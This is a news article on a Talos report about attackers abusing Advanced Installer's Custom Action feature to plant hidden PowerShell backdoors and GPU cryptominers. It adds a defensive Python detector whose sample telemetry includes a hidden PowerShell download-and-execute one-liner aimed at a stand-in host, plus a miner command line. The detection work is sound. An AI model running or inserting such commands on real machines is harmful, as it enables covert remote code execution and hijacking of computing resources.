Hackers Exploit Windows Tool to Drop Cryptocurrency-Mining Malware
In a recent analysis, Cisco’s Talos Intelligence revealed that hackers have been abusing a Windows tool since November 2021 to distribute cryptocurrency-mining malware. The tool being abused is Advanced Installer, a Windows tool that developers use to package installers for software such as Adobe Illustrator. By leveraging this tool, the attacker can execute malicious scripts on compromised machines.
Targeting Graphic Designers and 3D Modeling Software Installers
The malware campaign primarily targets software installers used for 3D modeling and graphic design, with a majority of them being written in French. This suggests that victims are likely from various industries, including architecture, engineering, construction, manufacturing, and entertainment in French-speaking countries.
Geographical Impact and Modus Operandi
The attacks mainly affect users in France and Switzerland, but there have also been infections reported in other countries such as the United States, Canada, Algeria, Sweden, Germany, Tunisia, Madagascar, Singapore, and Vietnam. The attacker establishes a backdoor on the victim’s machine using malicious PowerShell and Windows batch scripts, taking advantage of PowerShell’s ability to run code directly in memory rather than from files written to the hard drive, which makes detection more challenging.
The Payload: Ethereum-Mining Programs
Once the backdoor is installed, the attacker deploys additional threats, including the Ethereum crypto-mining program PhoenixMiner and the multicoin mining threat lolMiner. These programs utilize the GPU capabilities of infected computers.
“These malicious scripts are executed using Advanced Installer’s Custom Action feature, which allows users to predefine custom installation tasks. The final payloads are PhoenixMiner and lolMiner, publicly available miners relying on computers’ GPU capabilities.”
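The two passages above describe the detection problem from the defender’s side: a legitimate installer (an MSI or a vendor setup executable) spawns a script host such as PowerShell or cmd.exe, the script runs hidden and in memory, and eventually a publicly available GPU miner appears on the box. The following is an added example, not code from the Talos report or from this article, showing how those traits can be scored in process-creation telemetry. The event records are constructed to resemble Sysmon Event ID 1 fields; the PowerShell switches matched (-EncodedCommand, -WindowStyle Hidden, -ExecutionPolicy Bypass) are real, while the installer-name pattern and the event shape are assumptions made for the example.

```python
"""
Flag installer-spawned script hosts, in-memory execution switches and
known GPU miner binaries in process-creation events.

Added example; the records below are constructed for illustration and
are not indicators from the Talos report.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the created process
    command_line: str
    parent_image: str   # full path of the parent process


# Interpreters an installer should rarely need to launch on an end-user box.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Assumption: msiexec.exe or any executable with "setup"/"install" in its name
# is treated as an installer parent.
INSTALLER_NAME = re.compile(r"^(msiexec\.exe|.*(setup|install).*\.exe)$", re.I)

# Miner binaries named in the article (matched case-insensitively on the image name).
MINER_NAMES = ("phoenixminer", "lolminer")

# Real PowerShell switches and cmdlets that indicate hidden, in-memory execution.
SUSPICIOUS_FLAGS = [
    (re.compile(r"-(enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-(w|windowstyle)\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass\b", re.I), "execution policy bypass"),
    (re.compile(r"\b(iex|invoke-expression|downloadstring)\b", re.I), "in-memory download/execution"),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: ProcEvent) -> List[str]:
    """Return the list of reasons an event is suspicious (empty if benign)."""
    reasons: List[str] = []
    img = basename(ev.image)
    parent = basename(ev.parent_image)

    # Trait 1: a script host launched by an installer (Custom Action behaviour).
    if img in SCRIPT_HOSTS and INSTALLER_NAME.match(parent):
        reasons.append(f"script host {img} spawned by installer {parent}")

    # Trait 2: switches that hide the window or run code without touching disk.
    if img in SCRIPT_HOSTS:
        for pattern, label in SUSPICIOUS_FLAGS:
            if pattern.search(ev.command_line):
                reasons.append(label)

    # Trait 3: the payload itself, a publicly available GPU miner.
    if any(name in img for name in MINER_NAMES):
        reasons.append(f"known GPU miner binary {img}")

    return reasons


def analyze(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map each flagged pid to its reasons; benign events are omitted."""
    return {ev.pid: r for ev in events if (r := analyze_event(ev))}


# Constructed sample telemetry (not real indicators).
SAMPLE_EVENTS = [
    ProcEvent(101, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand U3RhcnQtU2xlZXA=",
              r"C:\Windows\System32\msiexec.exe"),
    ProcEvent(102, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\Users\alice\backup.ps1",
              r"C:\Windows\explorer.exe"),
    ProcEvent(103, r"C:\Users\alice\AppData\Roaming\PhoenixMiner.exe",
              "PhoenixMiner.exe -pool pool.example.invalid:4444 -wal PLACEHOLDER_WALLET",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(104, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x')\"",
              r"C:\Users\alice\Downloads\Illustrator_Setup_FR.exe"),
    ProcEvent(105, r"C:\Windows\System32\msiexec.exe", "msiexec.exe /V",
              r"C:\Windows\System32\svchost.exe"),
]


if __name__ == "__main__":
    for pid, reasons in analyze(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Run stand-alone, the script reports pids 101, 103 and 104 and stays silent on the ordinary user script (102) and the service-launched msiexec (105). The parent/child rule is deliberately separate from the command-line rule so that a hidden encoded PowerShell launched from a setup executable scores on both, which is the combination the campaign described above would produce.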
Understanding Cryptojacking and Its Impact
The use of crypto-mining malware, also known as cryptojacking, involves covertly installing mining code on devices without the user’s knowledge or permission. Signs of mining malware include device overheating and decreased performance. This practice of hijacking devices to mine or steal cryptocurrencies is not new and has been observed targeting sectors such as financial services, healthcare, and government.
Hot Take: Protect Yourself from Crypto-Mining Malware
As the prevalence of crypto-mining malware continues to rise, it is crucial to stay vigilant and employ robust cybersecurity practices. Regularly update your operating system and software, use reputable antivirus software, and exercise caution when downloading and installing programs. By adopting these measures, you can safeguard your devices and keep your computing resources from being hijacked by malicious actors.